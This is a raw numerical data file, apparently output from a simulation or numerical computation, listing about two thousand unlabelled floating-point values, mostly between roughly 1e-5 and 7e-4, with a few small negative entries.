0.000137443
0.000119876
0.000111082
0.000111082
0.000119867
0.000119867
0.000119866
0.000111075
0.000119876
0.000111082
0.00011108
0.000119866
0.000119865
0.000119865
0.000111076
0.000119875
0.000111082
0.000111083
0.000119866
0.000119866
0.000119865
0.000111077
0.000119876
0.00011108
0.000111082
0.000119865
0.000119866
0.000119865
0.000111077
0.000130415
0.000130666
0.000126643
0.000126846
0.000130666
0.000130417
0.000126853
0.000135611
0.00013936
0.000139478
0.000135376
0.000139276
0.000135516
0.000135407
0.000135652
0.000135429
0.000139464
0.000139266
0.000139261
0.000135428
0.000135642
0.000130472
0.000126618
0.000130725
0.000126725
0.00013057
0.000130694
0.000126818
0.000130413
0.000130676
0.000126845
0.000126648
0.000130419
0.000130675
0.00012685
0.00013561
0.000139359
0.000139479
0.000135377
0.000139276
0.000135517
0.000135409
0.000135654
0.000135436
0.000139266
0.000139471
0.000139265
0.000135645
0.000135435
0.000130471
0.000126622
0.000130729
0.000126728
0.000130572
0.000130699
0.000126818
0.00013065
0.000130242
0.000126843
0.000126845
0.000130496
0.000130498
0.00012668
0.00010228
0.00010228
9.34932e-05
9.34985e-05
9.34988e-05
9.34857e-05
0.000102279
0.000102281
0.000102282
9.34952e-05
9.34999e-05
9.35001e-05
9.34849e-05
0.000102279
0.00010228
0.000102282
9.34954e-05
9.34991e-05
9.34996e-05
9.34862e-05
0.00010228
8.47127e-05
7.59222e-05
7.59195e-05
8.46946e-05
8.4694e-05
8.4696e-05
7.59115e-05
8.47109e-05
7.59213e-05
7.59165e-05
8.46936e-05
8.46922e-05
8.46948e-05
7.59109e-05
8.47106e-05
7.59189e-05
7.5918e-05
8.46929e-05
8.46924e-05
8.46944e-05
7.59113e-05
8.47114e-05
7.59179e-05
7.59182e-05
8.46932e-05
8.46923e-05
8.46942e-05
7.59105e-05
9.52043e-05
9.54973e-05
9.14873e-05
9.16883e-05
9.54899e-05
9.52089e-05
9.16953e-05
0.000100459
0.000104189
0.000104321
0.000100228
0.000104115
0.000100369
0.000100247
0.000100509
0.000100274
0.00010431
0.00010412
0.000104109
0.000100281
0.000100491
9.52973e-05
9.14468e-05
9.55513e-05
9.15691e-05
9.5399e-05
9.55341e-05
9.16577e-05
9.52093e-05
9.54907e-05
9.16949e-05
9.14877e-05
9.52143e-05
9.54877e-05
9.17005e-05
0.000100459
0.000104189
0.000104322
0.000100229
0.000104113
0.00010037
0.000100246
0.00010051
0.00010027
0.00010412
0.000104304
0.000104106
0.000100492
0.000100276
9.52994e-05
9.14489e-05
9.55536e-05
9.15716e-05
9.54002e-05
9.55343e-05
9.1661e-05
9.54847e-05
9.50952e-05
9.16731e-05
9.16732e-05
9.534e-05
9.5341e-05
9.15073e-05
6.71254e-05
6.71211e-05
5.8362e-05
5.84032e-05
5.84015e-05
5.84242e-05
6.71413e-05
6.71236e-05
6.71215e-05
5.83635e-05
5.84027e-05
5.84015e-05
5.84252e-05
6.71427e-05
6.71227e-05
6.71208e-05
5.836e-05
5.84031e-05
5.83993e-05
5.84236e-05
6.71415e-05
4.96626e-05
4.12231e-05
4.12238e-05
4.97066e-05
4.97067e-05
4.98066e-05
4.14006e-05
4.96593e-05
4.12213e-05
4.12209e-05
4.97045e-05
4.97032e-05
4.98052e-05
4.14003e-05
4.96606e-05
4.12226e-05
4.12188e-05
4.97052e-05
4.97032e-05
4.98057e-05
4.13996e-05
4.96563e-05
4.12193e-05
4.12173e-05
4.97029e-05
4.97e-05
4.9804e-05
4.1399e-05
5.99356e-05
6.02927e-05
5.6331e-05
5.65438e-05
6.02822e-05
5.99496e-05
5.65653e-05
6.52988e-05
6.89768e-05
6.91639e-05
6.50802e-05
6.89199e-05
6.52189e-05
6.50434e-05
6.53767e-05
6.50955e-05
6.91231e-05
6.89636e-05
6.89265e-05
6.5106e-05
6.53423e-05
6.0109e-05
5.62217e-05
6.03358e-05
5.64186e-05
6.0198e-05
6.03964e-05
5.6501e-05
5.99372e-05
6.0297e-05
5.65411e-05
5.63298e-05
5.9946e-05
6.02797e-05
5.65654e-05
6.52959e-05
6.89781e-05
6.91627e-05
6.50801e-05
6.89204e-05
6.5218e-05
6.50405e-05
6.53767e-05
6.51006e-05
6.89655e-05
6.91235e-05
6.89296e-05
6.53405e-05
6.51037e-05
6.01037e-05
5.62195e-05
6.03349e-05
5.64178e-05
6.01942e-05
6.03879e-05
5.65002e-05
6.03048e-05
5.99567e-05
5.65086e-05
5.65063e-05
6.01809e-05
6.01812e-05
5.63309e-05
3.2974e-05
3.29734e-05
2.47464e-05
2.53199e-05
2.53173e-05
2.58476e-05
3.33491e-05
3.29724e-05
3.29687e-05
2.4742e-05
2.53159e-05
2.53122e-05
2.5845e-05
3.33468e-05
3.29702e-05
3.29684e-05
2.47393e-05
2.53131e-05
2.53123e-05
2.58437e-05
3.33466e-05
1.76755e-05
1.23305e-05
1.23292e-05
1.83267e-05
1.83265e-05
1.28021e-05
1.89823e-05
1.7673e-05
1.23299e-05
1.2325e-05
1.83264e-05
1.8322e-05
1.28002e-05
1.89796e-05
1.76664e-05
1.23262e-05
1.23232e-05
1.83217e-05
1.83181e-05
1.27983e-05
1.89771e-05
1.76663e-05
1.23224e-05
1.23225e-05
1.83181e-05
1.83184e-05
1.27976e-05
1.8976e-05
2.48996e-05
2.50383e-05
2.1097e-05
2.18632e-05
2.48982e-05
2.50337e-05
2.1828e-05
3.02027e-05
3.36448e-05
3.39724e-05
2.98472e-05
3.36781e-05
3.01212e-05
2.95911e-05
3.04283e-05
2.9915e-05
3.38564e-05
3.39882e-05
3.38455e-05
2.99033e-05
3.03814e-05
2.48585e-05
2.04746e-05
2.45973e-05
2.13432e-05
2.47523e-05
2.49979e-05
2.15327e-05
2.48995e-05
2.50419e-05
2.18602e-05
2.10987e-05
2.50344e-05
2.49025e-05
2.18254e-05
3.02063e-05
3.36408e-05
3.39774e-05
2.98516e-05
3.36801e-05
3.01201e-05
2.95975e-05
3.04269e-05
2.99196e-05
3.39895e-05
3.38647e-05
3.38445e-05
3.03817e-05
2.99099e-05
2.48623e-05
2.04861e-05
2.4603e-05
2.13414e-05
2.47557e-05
2.50092e-05
2.15322e-05
2.4856e-05
2.50485e-05
2.14355e-05
2.14338e-05
2.50495e-05
2.50467e-05
2.08256e-05
5.78983e-06
1.75209e-06
4.92925e-06
7.20533e-07
6.2961e-06
4.81955e-06
2.3286e-06
6.48325e-06
2.59475e-07
-3.52643e-06
1.91643e-06
3.02194e-06
6.74734e-07
2.92573e-06
5.8059e-06
1.75633e-06
7.36659e-07
4.94119e-06
6.31562e-06
2.33447e-06
4.83046e-06
5.82046e-06
4.8239e-06
3.32939e-06
9.73936e-06
5.42906e-06
7.43471e-06
7.7769e-06
5.63834e-06
3.25698e-06
3.1317e-06
6.66948e-06
6.45371e-06
6.61813e-06
5.00801e-06
6.49736e-06
2.73868e-07
-3.51052e-06
1.92493e-06
3.03248e-06
6.91816e-07
2.94186e-06
5.8206e-06
4.82247e-06
3.32693e-06
9.73817e-06
5.42687e-06
7.43316e-06
7.7786e-06
5.63235e-06
3.25627e-06
6.66719e-06
3.12901e-06
6.45105e-06
5.00693e-06
6.61766e-06
5.10359e-06
6.6749e-06
3.92967e-06
-6.6054e-07
5.63324e-07
7.61545e-06
2.0736e-06
5.10717e-06
6.68556e-06
3.93848e-06
-6.54361e-07
5.66902e-07
7.62447e-06
2.0799e-06
0.000727851
0.000727447
0.00072405
0.000724047
0.000723888
0.000727699
0.000727697
0.000715131
0.000715537
0.000718923
0.000718923
0.000719076
0.000715293
0.000715294
0.000727674
0.000727892
0.000723851
0.000724056
0.000727902
0.000727675
0.000724064
0.00073283
0.000736591
0.000736708
0.000732588
0.000732628
0.000736501
0.000732733
0.000732864
0.000732651
0.00073669
0.00073647
0.000732647
0.00073647
0.000732857
0.000727711
0.000723838
0.000727955
0.00072394
0.000727926
0.000727807
0.000724034
0.000727674
0.000727892
0.000723851
0.000724056
0.000727903
0.000727674
0.000724062
0.00073283
0.00073659
0.000736708
0.000732588
0.000736498
0.000732627
0.000732734
0.000732864
0.000732651
0.000736688
0.000736468
0.000736467
0.000732647
0.000732857
0.000727712
0.000723835
0.000727954
0.000723939
0.000727923
0.000724034
0.000727806
0.000715306
0.000719128
0.000718909
0.000715092
0.000718909
0.000715088
0.000715305
0.000710166
0.000706392
0.000710402
0.000706287
0.000710257
0.000710374
0.000706485
0.000715274
0.00071915
0.000719032
0.00071503
0.000715177
0.000718943
0.000715071
0.00071013
0.000710354
0.000706307
0.000706523
0.000710356
0.000710142
0.000706518
0.000715306
0.000719128
0.000718908
0.000715092
0.000718908
0.000715088
0.000715304
0.000710165
0.000706397
0.000710405
0.000706289
0.000710374
0.00071026
0.000706487
0.000715274
0.000719146
0.000719029
0.000715032
0.000718943
0.000715069
0.000715178
0.000710131
0.000710354
0.00070631
0.000706526
0.000710356
0.000710144
0.000706523
0.000727858
0.000727446
0.000724052
0.000724052
0.000727697
0.000727698
0.000723894
0.000715133
0.000715541
0.000718926
0.000718927
0.000715295
0.00071908
0.000715294
0.000727671
0.000727895
0.000723849
0.000724057
0.000727902
0.000727675
0.000724061
0.000732829
0.000736587
0.000736709
0.000732588
0.000732628
0.000736496
0.00073273
0.00073286
0.000732652
0.000736687
0.000736466
0.000732644
0.000736464
0.000732855
0.000727711
0.000723836
0.000727953
0.000723937
0.000727926
0.000727804
0.000724032
0.000727669
0.000727898
0.000724053
0.000723849
0.000727674
0.000727903
0.000724056
0.000732828
0.000736587
0.000736706
0.000732587
0.000736498
0.000732626
0.00073273
0.000732862
0.000732653
0.000736467
0.000736689
0.000736468
0.000732858
0.000732646
0.000727708
0.000723836
0.000727952
0.000723936
0.000727924
0.00072403
0.000727803
0.000715303
0.000719123
0.000718906
0.000715085
0.000718906
0.000715082
0.000715295
0.000710161
0.000706391
0.000710399
0.000706284
0.000710256
0.000710367
0.000706483
0.000715272
0.000719143
0.000719028
0.000715026
0.000715176
0.00071894
0.000715064
0.00071013
0.000710348
0.000706305
0.000706522
0.000710352
0.000710136
0.000706519
0.000715301
0.000718904
0.000719123
0.000715085
0.000718904
0.000715296
0.000715081
0.000710158
0.00070639
0.000710399
0.000706284
0.000710367
0.000710254
0.000706482
0.000715268
0.000719143
0.000719026
0.000715027
0.000718937
0.000715064
0.000715173
0.000710126
0.000710347
0.000706521
0.000706304
0.000710137
0.000710349
0.000706516
0.000727677
0.000727898
0.000724058
0.000723852
0.000727683
0.000727903
0.000724064
0.00072771
0.000723836
0.000727957
0.000723941
0.000727808
0.000727923
0.000724033
0.000715308
0.00071913
0.000718909
0.000715089
0.000718913
0.000715087
0.000715302
0.000710167
0.000706397
0.000710405
0.000706292
0.000706493
0.000710261
0.000710375
0.000715278
0.000719148
0.000719033
0.000715032
0.000718948
0.00071518
0.00071507
0.000710132
0.000710353
0.000706314
0.000706525
0.000706526
0.000710357
0.000710142
0.000715308
0.000718911
0.000719128
0.000715091
0.000718912
0.000715306
0.000715087
0.00071017
0.000706396
0.000710405
0.000706289
0.000710375
0.000710262
0.000706489
0.000715278
0.000719147
0.000719033
0.000715031
0.000718945
0.00071507
0.000715179
0.000710132
0.000710353
0.000706525
0.000706308
0.000710145
0.000710357
0.000706521
0.000727851
0.000727447
0.000724049
0.000724049
0.000727697
0.000727696
0.000723889
0.000715128
0.000715535
0.00071892
0.000718923
0.000715289
0.000719075
0.00071529
0.000727677
0.000727906
0.000724056
0.000723856
0.000727679
0.000727907
0.000724064
0.000732834
0.000736712
0.000736502
0.000732632
0.000732868
0.000732661
0.000736472
0.000736694
0.000732861
0.000736472
0.000732653
0.000727713
0.00072384
0.000727959
0.000723943
0.000727809
0.000727927
0.000724035
0.000715304
0.000718905
0.000719128
0.000715089
0.000718907
0.000715297
0.000715085
0.000710161
0.000706396
0.000710402
0.000706288
0.000706489
0.000710258
0.000710371
0.000715272
0.000719148
0.00071903
0.000715028
0.000718943
0.000715176
0.000715067
0.000710129
0.000710351
0.000706526
0.000706309
0.000706524
0.000710139
0.000710354
0.000715306
0.000718906
0.000719131
0.000715093
0.00071891
0.000715298
0.000715095
0.000710171
0.000706397
0.000710409
0.000706295
0.000710385
0.000710264
0.00070649
0.00071528
0.000719152
0.000719034
0.000715037
0.000718945
0.000715081
0.000715183
0.000710132
0.000710354
0.000706524
0.000706314
0.000710139
0.000710365
0.000706522
0.000715138
0.000715532
0.00071893
0.000718929
0.000719087
0.000715293
0.000715293
0.00069275
0.00069234
0.000688954
0.000688952
0.000688795
0.000692595
0.000692594
0.00068002
0.000680409
0.000683809
0.00068381
0.000683974
0.000680171
0.000680172
0.000692576
0.000692799
0.000688751
0.000688962
0.0006928
0.000692582
0.000688963
0.000697709
0.000701473
0.00070159
0.000697473
0.000697507
0.000701381
0.000697613
0.000697748
0.000697539
0.000701572
0.000701348
0.00069753
0.000701349
0.000697742
0.000692604
0.00068873
0.000692846
0.000688836
0.000692814
0.000692699
0.00068893
0.000692575
0.000692797
0.00068875
0.000688959
0.0006928
0.000692579
0.000688962
0.000697713
0.000701473
0.000701592
0.000697475
0.000701383
0.00069751
0.000697616
0.000697751
0.000697539
0.000701574
0.000701351
0.000701356
0.000697533
0.000697741
0.000692604
0.000688729
0.000692847
0.000688837
0.000692815
0.000688928
0.000692699
0.000680185
0.000684014
0.000683788
0.000679975
0.000683791
0.000679968
0.000680177
0.000675045
0.000671274
0.000675289
0.00067117
0.000675139
0.000675256
0.000671366
0.000680152
0.000684032
0.000683914
0.000679917
0.000680055
0.000683826
0.000679951
0.000675012
0.000675237
0.00067119
0.000671405
0.000675239
0.00067502
0.000671401
0.000680186
0.000684015
0.000683787
0.000679976
0.00068379
0.000679973
0.000680177
0.000675047
0.000671278
0.00067529
0.000671173
0.000675257
0.000675141
0.00067137
0.000680156
0.000684033
0.000683915
0.000679918
0.000683825
0.000679954
0.000680059
0.000675012
0.000675237
0.000671193
0.000671406
0.000675242
0.000675019
0.000671403
0.000692751
0.000692342
0.000688955
0.000688954
0.000692595
0.000692596
0.000688794
0.00068002
0.000680415
0.000683811
0.000683814
0.000680175
0.000683972
0.000680175
0.000692569
0.000692793
0.000688746
0.000688954
0.000692795
0.000692575
0.000688955
0.000697707
0.000701469
0.000701587
0.000697472
0.000697505
0.000701378
0.00069761
0.000697745
0.000697535
0.00070157
0.000701349
0.000697527
0.000701349
0.000697739
0.000692598
0.000688727
0.000692844
0.000688833
0.00069281
0.000692694
0.000688924
0.000692569
0.000692791
0.000688954
0.000688744
0.000692574
0.000692794
0.000688956
0.000697707
0.000701469
0.000701588
0.00069747
0.00070138
0.000697504
0.000697609
0.000697746
0.000697534
0.000701346
0.000701571
0.000701349
0.000697739
0.000697527
0.000692597
0.000688724
0.000692842
0.000688831
0.000692808
0.000688921
0.000692693
0.000680178
0.000684009
0.000683783
0.000679969
0.000683784
0.000679964
0.000680173
0.000675043
0.000671274
0.000675287
0.000671168
0.000675138
0.000675254
0.000671366
0.000680151
0.00068403
0.000683912
0.000679915
0.000680055
0.000683822
0.000679949
0.000675006
0.000675232
0.000671188
0.000671399
0.000675235
0.000675016
0.000671397
0.00068018
0.000683784
0.000684007
0.000679967
0.000683785
0.000680171
0.000679963
0.00067504
0.000671274
0.000675285
0.000671167
0.000675251
0.000675135
0.000671364
0.000680148
0.000684026
0.000683908
0.000679914
0.000683819
0.000679946
0.000680052
0.000675007
0.00067523
0.000671397
0.000671187
0.000675014
0.000675233
0.000671397
0.000692576
0.000692796
0.000688957
0.00068875
0.000692578
0.0006928
0.00068896
0.000697715
0.000701477
0.000701594
0.000697475
0.000697617
0.000701386
0.000697511
0.000697751
0.000697538
0.000701349
0.000701574
0.000697741
0.000701354
0.000697533
0.000692604
0.000688731
0.000692848
0.000688837
0.000692699
0.000692813
0.000688929
0.00068019
0.000684014
0.000683791
0.000679975
0.000683793
0.000679969
0.000680184
0.000675049
0.000671282
0.00067529
0.000671176
0.000671376
0.000675142
0.000675258
0.000680157
0.000684033
0.000683918
0.000679918
0.000683829
0.000680059
0.000679952
0.000675017
0.00067524
0.000671196
0.00067141
0.00067141
0.000675241
0.000675028
0.000680187
0.000683788
0.000684014
0.000679975
0.00068379
0.000680182
0.000679971
0.000675048
0.000671278
0.000675291
0.000671173
0.000675258
0.000675143
0.00067137
0.000680157
0.000684034
0.000683918
0.000679918
0.000683828
0.000679954
0.00068006
0.000675018
0.00067524
0.000671408
0.000671192
0.000675027
0.000675241
0.000671405
0.000692747
0.000692336
0.000688949
0.000688948
0.000692589
0.000692591
0.00068879
0.000680017
0.000680409
0.000683803
0.000683806
0.00068017
0.000683967
0.00068017
0.000692572
0.000692793
0.000688958
0.000688748
0.000692579
0.000692796
0.000688959
0.00069771
0.000701473
0.000701593
0.000697476
0.000697613
0.000701384
0.000697509
0.000697747
0.000697536
0.000701352
0.000701575
0.000697744
0.000701353
0.000697529
0.000692603
0.00068873
0.000692848
0.000688838
0.000692697
0.000692814
0.000688929
0.000680183
0.000683787
0.00068401
0.000679971
0.000683789
0.000680176
0.000679967
0.000675043
0.000671277
0.000675288
0.000671173
0.00067137
0.000675139
0.000675255
0.000680152
0.000684029
0.000683912
0.000679915
0.000683823
0.000680055
0.000679948
0.000675009
0.000675234
0.0006714
0.000671192
0.000671402
0.000675018
0.000675237
0.000680182
0.000683787
0.000684012
0.000679972
0.000683788
0.000680175
0.000679968
0.000675045
0.000671278
0.00067529
0.000671173
0.000675258
0.000675141
0.000671368
0.000680154
0.000684032
0.000683916
0.000679918
0.000683825
0.000679953
0.000680059
0.000675008
0.000675234
0.000671399
0.000671191
0.000675017
0.000675239
0.000671399
0.00068002
0.000680412
0.000683811
0.000683811
0.000683973
0.000680173
0.000680173
0.000657632
0.000657221
0.000653833
0.000653832
0.000653674
0.000657476
0.000657476
0.000644902
0.000645295
0.000648689
0.000648691
0.000648852
0.000645056
0.000645056
0.000657453
0.000657676
0.00065363
0.000653837
0.000657679
0.00065746
0.000653837
0.000662595
0.000666355
0.000666474
0.000662356
0.000662392
0.000666265
0.000662495
0.000662631
0.000662419
0.000666455
0.000666232
0.000662413
0.000666235
0.000662624
0.000657485
0.000653611
0.000657729
0.000653715
0.000657697
0.000657579
0.000653806
0.000657452
0.000657677
0.000653632
0.000653839
0.000657682
0.00065746
0.000653841
0.000662596
0.000666356
0.000666478
0.000662358
0.000666269
0.000662395
0.000662499
0.000662629
0.00066242
0.000666459
0.000666233
0.000666234
0.000662416
0.000662624
0.000657487
0.000653613
0.000657729
0.000653719
0.000657699
0.000653811
0.000657582
0.000645065
0.000648894
0.000648666
0.000644856
0.000648667
0.00064485
0.000645058
0.000639928
0.000636157
0.000640171
0.000636053
0.000640022
0.000640138
0.000636252
0.000645035
0.000648913
0.000648796
0.000644799
0.000644939
0.000648705
0.000644834
0.000639896
0.000640119
0.000636076
0.000636286
0.000640122
0.000639903
0.000636288
0.000645068
0.000648896
0.000648669
0.000644856
0.000648674
0.000644851
0.00064506
0.000639928
0.000636161
0.000640172
0.000636055
0.00064014
0.000640023
0.00063625
0.000645038
0.000648913
0.000648795
0.000644799
0.000648708
0.000644834
0.00064494
0.000639892
0.000640118
0.000636072
0.000636285
0.00064012
0.000639901
0.000636281
0.000657634
0.000657224
0.000653836
0.000653834
0.000657478
0.000657479
0.000653677
0.000644902
0.000645296
0.000648692
0.000648693
0.000645056
0.000648854
0.000645058
0.000657457
0.000657678
0.00065363
0.00065384
0.00065768
0.000657463
0.000653842
0.000662593
0.000666355
0.000666471
0.000662356
0.00066239
0.000666264
0.000662497
0.000662631
0.000662417
0.000666451
0.000666228
0.00066241
0.000666231
0.000662624
0.000657484
0.000653611
0.000657728
0.000653717
0.000657695
0.000657579
0.000653808
0.000657454
0.000657677
0.00065384
0.000653629
0.000657462
0.000657678
0.00065384
0.000662593
0.000666353
0.00066647
0.000662354
0.000666262
0.000662389
0.000662494
0.000662628
0.000662416
0.000666227
0.000666451
0.00066623
0.000662624
0.00066241
0.000657485
0.000653611
0.000657726
0.000653718
0.000657694
0.000653808
0.000657578
0.000645065
0.000648894
0.000648668
0.000644854
0.00064867
0.00064485
0.000645057
0.000639928
0.000636158
0.000640172
0.000636054
0.000640022
0.00064014
0.00063625
0.000645037
0.000648914
0.000648796
0.0006448
0.00064494
0.000648706
0.000644835
0.000639892
0.000640117
0.000636071
0.000636285
0.000640119
0.000639902
0.000636282
0.000645067
0.000648669
0.000648894
0.000644856
0.000648668
0.000645058
0.000644853
0.00063993
0.00063616
0.000640172
0.000636057
0.000640142
0.000640023
0.000636254
0.000645038
0.000648915
0.000648797
0.0006448
0.000648707
0.000644836
0.00064494
0.000639894
0.000640119
0.000636285
0.000636078
0.0006399
0.000640126
0.000636287
0.000657454
0.000657678
0.00065384
0.000653632
0.000657459
0.000657683
0.00065384
0.000662594
0.000666357
0.000666476
0.000662359
0.000662495
0.000666266
0.000662395
0.000662629
0.000662419
0.000666233
0.000666456
0.000662622
0.000666235
0.000662413
0.000657486
0.000653617
0.000657733
0.000653719
0.000657581
0.000657702
0.00065381
0.000645069
0.000648896
0.000648672
0.000644857
0.000648672
0.000644853
0.000645059
0.000639932
0.000636164
0.000640172
0.000636059
0.000636257
0.000640026
0.000640142
0.000645039
0.000648916
0.000648797
0.0006448
0.000648708
0.000644941
0.000644836
0.000639897
0.00064012
0.000636077
0.000636288
0.000636291
0.000640125
0.0006399
0.000645068
0.000648672
0.000648895
0.000644857
0.000648672
0.000645061
0.000644852
0.000639927
0.000636158
0.000640171
0.000636054
0.000640139
0.000640021
0.00063625
0.000645036
0.000648918
0.000648799
0.000644799
0.000648708
0.000644835
0.000644939
0.000639893
0.00064012
0.000636285
0.000636075
0.000639902
0.000640121
0.000636284
0.000657631
0.00065722
0.000653835
0.000653833
0.000657477
0.000657474
0.000653675
0.000644901
0.000645293
0.000648692
0.000648691
0.000645055
0.000648852
0.000645054
0.000657455
0.000657674
0.000653836
0.000653628
0.000657457
0.000657678
0.00065384
0.000662591
0.000666356
0.000666472
0.000662356
0.000662494
0.000666263
0.000662389
0.000662629
0.000662416
0.00066623
0.000666451
0.000662623
0.000666231
0.000662409
0.000657484
0.00065361
0.000657727
0.000653716
0.000657576
0.000657693
0.000653808
0.000645064
0.000648667
0.000648891
0.000644851
0.000648668
0.000645057
0.000644847
0.000639924
0.000636159
0.00064017
0.000636053
0.000636252
0.000640021
0.000640136
0.000645033
0.000648912
0.000648794
0.000644797
0.000648704
0.000644938
0.00064483
0.000639891
0.000640116
0.000636284
0.000636074
0.000636287
0.000639897
0.000640118
0.000645066
0.000648666
0.000648891
0.000644853
0.000648669
0.000645056
0.000644849
0.000639927
0.000636158
0.000640171
0.000636053
0.000640138
0.000640022
0.000636249
0.000645036
0.000648911
0.000648793
0.000644798
0.000648704
0.000644832
0.000644938
0.000639892
0.000640117
0.000636282
0.000636073
0.000639898
0.000640121
0.00063628
0.000644899
0.000645294
0.000648694
0.000648692
0.000648853
0.000645056
0.000645054
0.000622514
0.000622103
0.000618715
0.000618715
0.000618557
0.000622358
0.000622359
0.000609783
0.000610175
0.000613571
0.000613574
0.000613733
0.000609937
0.000609937
0.000622334
0.000622557
0.000618509
0.000618719
0.000622561
0.000622342
0.00061872
0.000627475
0.000631239
0.000631356
0.000627238
0.000627274
0.000631148
0.000627378
0.000627512
0.0006273
0.000631338
0.000631113
0.000627294
0.000631118
0.000627507
0.000622368
0.000618493
0.000622611
0.000618598
0.000622581
0.000622463
0.000618688
0.000622333
0.000622557
0.00061851
0.000618717
0.00062256
0.000622341
0.000618719
0.000627476
0.000631237
0.000631357
0.000627241
0.000631146
0.000627276
0.000627378
0.00062751
0.0006273
0.000631335
0.000631112
0.000631114
0.000627294
0.000627506
0.000622366
0.000618496
0.000622613
0.000618599
0.000622582
0.000618689
0.000622462
0.000609943
0.000613774
0.000613546
0.000609732
0.00061355
0.00060973
0.000609932
0.000604806
0.000601037
0.00060505
0.00060093
0.000604902
0.000605018
0.000601128
0.000609915
0.000613793
0.000613677
0.000609678
0.000609819
0.000613586
0.000609713
0.000604771
0.000604994
0.00060095
0.000601164
0.000604998
0.000604776
0.000601163
0.000609944
0.000613772
0.000613546
0.000609733
0.000613548
0.000609727
0.000609936
0.000604807
0.000601039
0.000605049
0.000600931
0.000605017
0.000604902
0.000601131
0.000609914
0.000613794
0.000613675
0.000609679
0.000613584
0.000609713
0.00060982
0.000604774
0.000604996
0.00060095
0.000601164
0.000604998
0.000604778
0.000601164
0.000622514
0.000622103
0.000618715
0.000618717
0.00062236
0.000622357
0.000618558
0.000609783
0.000610174
0.00061357
0.000613573
0.000609936
0.000613734
0.000609936
0.00062234
0.00062256
0.000618515
0.000618723
0.000622564
0.000622342
0.000618729
0.000627478
0.000631238
0.000631356
0.000627239
0.000627275
0.000631148
0.00062738
0.000627514
0.000627301
0.000631336
0.000631113
0.000627295
0.000631116
0.000627506
0.00062237
0.000618495
0.000622611
0.000618602
0.00062258
0.000622463
0.000618695
0.000622336
0.000622561
0.000618722
0.000618514
0.000622343
0.000622565
0.000618723
0.000627482
0.00063124
0.000631359
0.000627242
0.000631151
0.000627282
0.000627383
0.000627513
0.000627302
0.000631113
0.00063134
0.000631119
0.000627507
0.000627297
0.00062237
0.0006185
0.000622615
0.000618602
0.000622587
0.000618692
0.000622465
0.000609952
0.000613778
0.000613555
0.000609741
0.000613556
0.000609737
0.000609944
0.000604814
0.000601042
0.000605054
0.00060094
0.000604905
0.000605025
0.000601135
0.000609922
0.000613797
0.00061368
0.000609682
0.000609824
0.000613591
0.000609719
0.000604776
0.000605003
0.00060096
0.000601166
0.000605009
0.000604783
0.000601164
0.000609949
0.000613553
0.000613776
0.00060974
0.000613552
0.000609944
0.000609733
0.000604811
0.00060104
0.000605053
0.000600937
0.000605022
0.000604905
0.000601134
0.000609919
0.000613799
0.000613679
0.000609682
0.000613589
0.000609718
0.000609823
0.000604775
0.000605002
0.000601167
0.000600958
0.000604785
0.000605003
0.000601165
0.000622343
0.000622561
0.000618723
0.000618518
0.000622345
0.000622567
0.000618726
0.000627479
0.000631238
0.000631357
0.000627239
0.000627378
0.000631149
0.000627275
0.000627516
0.000627302
0.000631114
0.00063134
0.000627508
0.000631118
0.000627298
0.000622371
0.000618497
0.000622612
0.0006186
0.000622464
0.00062258
0.000618694
0.000609948
0.000613779
0.000613551
0.000609737
0.000613552
0.000609734
0.000609938
0.00060481
0.000601042
0.000605054
0.000600938
0.000601137
0.000604904
0.000605021
0.000609919
0.0006138
0.000613681
0.000609682
0.000613592
0.000609821
0.000609717
0.000604776
0.000605001
0.00060096
0.000601175
0.000601173
0.000605005
0.000604785
0.00060995
0.000613552
0.000613781
0.00060974
0.000613554
0.000609941
0.000609739
0.000604813
0.000601039
0.000605058
0.00060094
0.000605026
0.000604904
0.000601134
0.000609921
0.000613799
0.000613679
0.000609685
0.000613591
0.000609721
0.000609823
0.000604777
0.000605003
0.000601168
0.000600961
0.000604784
0.000605011
0.000601165
0.000622514
0.000622101
0.000618716
0.000618716
0.000622358
0.000622356
0.000618557
0.000609783
0.000610177
0.00061357
0.000613572
0.000609938
0.000613732
0.000609938
0.000622332
0.000622554
0.000618718
0.000618509
0.000622338
0.000622557
0.000618721
0.000627474
0.000631236
0.000631354
0.000627238
0.000627376
0.000631146
0.000627272
0.000627509
0.000627297
0.000631112
0.000631335
0.000627503
0.000631113
0.000627292
0.000622364
0.000618492
0.00062261
0.000618601
0.000622461
0.000622577
0.000618688
0.000609948
0.000613552
0.000613772
0.000609732
0.000613552
0.00060994
0.000609729
0.000604808
0.000601041
0.000605051
0.000600934
0.000601135
0.000604903
0.000605016
0.000609918
0.000613792
0.000613677
0.000609678
0.000613588
0.000609821
0.000609712
0.000604773
0.000604996
0.000601171
0.000600954
0.000601167
0.000604783
0.000604998
0.000609949
0.000613551
0.000613773
0.000609735
0.000613554
0.000609938
0.000609732
0.00060481
0.000601042
0.000605052
0.000600934
0.000605019
0.000604905
0.000601133
0.000609919
0.000613793
0.000613679
0.00060968
0.000613587
0.000609714
0.000609822
0.000604776
0.000604998
0.000601168
0.000600954
0.000604782
0.000605003
0.000601166
0.000609788
0.000610173
0.000613578
0.000613579
0.000613739
0.00060994
0.000609941
0.000587393
0.000586981
0.000583593
0.000583594
0.000583436
0.000587236
0.000587237
0.000574661
0.000575056
0.000578449
0.00057845
0.000578612
0.000574815
0.000574816
0.000587214
0.000587437
0.000583388
0.0005836
0.00058744
0.000587224
0.000583597
0.000592356
0.000596119
0.000596233
0.000592116
0.000592151
0.000596027
0.000592258
0.000592392
0.000592178
0.000596214
0.000595991
0.000592172
0.000595996
0.000592386
0.000587245
0.000583372
0.00058749
0.000583475
0.000587457
0.00058734
0.000583566
0.000587213
0.000587436
0.000583389
0.000583597
0.00058744
0.000587219
0.0005836
0.000592355
0.000596117
0.000596232
0.000592116
0.000596027
0.000592151
0.000592258
0.00059239
0.000592179
0.000596214
0.000595992
0.000595995
0.000592172
0.000592384
0.000587246
0.000583372
0.000587489
0.00058348
0.000587457
0.000583568
0.000587341
0.000574825
0.000578653
0.000578427
0.000574614
0.000578428
0.000574611
0.000574816
0.000569689
0.000565919
0.000569932
0.000565817
0.000569783
0.000569899
0.000566014
0.000574796
0.000578673
0.000578554
0.000574559
0.000574698
0.000578466
0.000574594
0.000569654
0.000569877
0.000565837
0.000566043
0.000569882
0.000569659
0.000566045
0.000574825
0.000578655
0.000578426
0.000574614
0.000578429
0.000574611
0.000574816
0.000569688
0.000565919
0.000569931
0.000565816
0.000569898
0.000569781
0.000566014
0.000574796
0.000578674
0.000578557
0.00057456
0.000578466
0.000574594
0.0005747
0.000569652
0.000569876
0.000565834
0.000566045
0.000569879
0.000569659
0.000566043
0.000587394
0.000586983
0.000583599
0.000583599
0.000587237
